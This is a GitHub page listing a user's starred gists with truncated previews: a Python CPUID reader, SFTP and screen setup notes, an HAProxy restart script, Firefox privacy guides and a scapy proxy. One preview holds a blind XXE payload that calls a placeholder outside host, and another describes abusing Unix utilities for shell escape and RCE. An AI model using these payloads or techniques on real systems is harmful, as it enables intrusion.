Skip to content

Instantly share code, notes, and snippets.

View fser's full-sized avatar

@aifsair fser

18 followers · 20 following
View GitHub Profile
@NicolasT
NicolasT / cpuid.py
Created November 29, 2009 01:49
# Some code to retrieve CPUID information in pure Python
#
# Copyright (C) 2009 Nicolas Trangez <eikke eikke com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, version 2.1
# of the License.
#
# This library is distributed in the hope that it will be useful,
@ryancdotorg
ryancdotorg / screen_autostart.sh
Created April 11, 2012 18:50
screen autostart
# Add to the bottom of ~/.profile
# Check if this is being called from an interactive shell
case "$-" in
*i*)
# Great, it's an interactive shell. Is this shell being stated by sshd?
if [ `readlink /proc/$PPID/exe` = "/usr/sbin/sshd" ]
then
# exec screen. Attach to or create a new session called auto_ssh.
# -x allows multiple copies of screen to be attached to the same session.
exec screen -xR auto_ssh
@jbenet
jbenet / sftp-user-notes.md
Created October 25, 2012 15:29

sftp user

So you want to configure an sftp only user?

Setup a group for sftp only users

groupadd sftponly

Make chroot jail directory

@staaldraad
staaldraad / XXE_payloads
Last active October 8, 2024 15:20
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@eXenon
eXenon / scapy_bridge.py
Last active May 12, 2024 03:00
Use scapy as a modifying proxy
#!/usr/bin/python2
"""
Use scapy to modify packets going through your machine.
Based on nfqueue to block packets in the kernel and pass them to scapy for validation
"""
import nfqueue
from scapy.all import *
import os
@lewisd32
lewisd32 / iptableflip.sh
Created April 15, 2015 18:20
Snippet of Unbounce script for restarting HAProxy with zero downtime
echo "Flipping tables! (╯°□°)╯︵ ┻━┻"
num_rules=3
real=3 # exposed to the ELB as port 443
test=4 # used to install test certs for domain verification
health=5 # used by the ELB healthcheck
blue_prefix=855
green_prefix=866
@atcuno
atcuno / gist:3425484ac5cce5298932
Last active November 8, 2024 00:20
HowTo: Privacy & Security Conscious Browsing

The purpose of this document is to make recommendations on how to browse in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.

I welcome contributions and comments on the information contained. Please see the How to Contribute section for information on contributing your own knowledge.

Table of Contents

@0XDE57
0XDE57 / config.md
Last active November 18, 2024 12:20
Firefox about:config privacy settings

ABOUT

about:config settings to harden the Firefox browser. Privacy and performance enhancements.
To change these settings type 'about:config' in the url bar. Then search the setting you would like to change and modify the value. Some settings may break certain websites from functioning and rendering normally. Some settings may also make firefox unstable. I am not liable for any damages/loss of data.

Not all these changes are necessary and will be dependent upon your usage and hardware. Do some research on settings if you don't understand what they do. These settings are best combined with your standard privacy extensions (HTTPS Everywhere No longer required: Enable HTTPS-Only Mode, NoScript/Request Policy, uBlock origin, agent spoofing, Privacy Badger etc), and all plugins set to "Ask To Activate".

@inability
inability / execution-through-execution.md
Last active November 29, 2018 13:29
Using Unix programs to execute other programs

This Gist documents Unix utilities that have options that can be abused to execute other, arbritrary commands. This information can be useful in many scenarios -- the ones that come to mind are abusing certain /etc/sudoers configurations, breaking out of limited shells (eg. the ones provided in many network devices) and getting RCE in webapps even with restrictive filters in place.

Many of these examples originally came from this blogpost.

This is the script that was used to test these examples:

$ cat test.sh
#!/bin/sh
@xals
xals / README.txt
Last active June 28, 2018 12:40
Simple python3 program to send email from a Jinja2 template and a CSV datasource
This is a simple Python3 program, using a CSV file with headers as datasource. Column names are injected in the template rendering to be used as variable substitution.
This is not perfect. For example, the encoding fails for address headers when there are some accentuated characters (éèà for example) in the firsname or the lastname.
The template can contain UTF-8 characters, the message is Base64 encoded before beeing sent.